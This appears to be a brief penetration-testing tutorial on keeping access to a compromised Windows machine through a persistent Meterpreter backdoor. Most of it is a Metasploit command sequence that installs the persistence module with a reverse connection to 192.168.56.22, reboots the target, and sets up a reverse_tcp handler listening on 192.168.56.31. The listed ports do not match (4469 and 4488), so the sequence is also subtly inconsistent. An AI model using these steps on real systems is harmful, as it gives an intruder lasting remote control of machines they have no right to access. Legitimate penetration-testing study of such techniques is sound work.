BackDoor Meterpreter Service

Maintaining access is a very important phase of penetration testing, unfortunately, it is one that is often overlooked. Most penetration testers get carried away whenever administrative access is obtained, so if the system is later patched, then they no longer have access to it.

Persistent backdoors help us access a system we have successfully compromised in the past. It is important to note that they may be out of scope during a penetration test; however, being familiar with them is of paramount importance. Let us look at a few persistent backdoors now!

session -i 1
getuid
background 
use exploit/windows/local/persistence

run persistance -X -i 5 -p 4469 -r 192.168.56.22
reboot
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.31
set lport 4488
run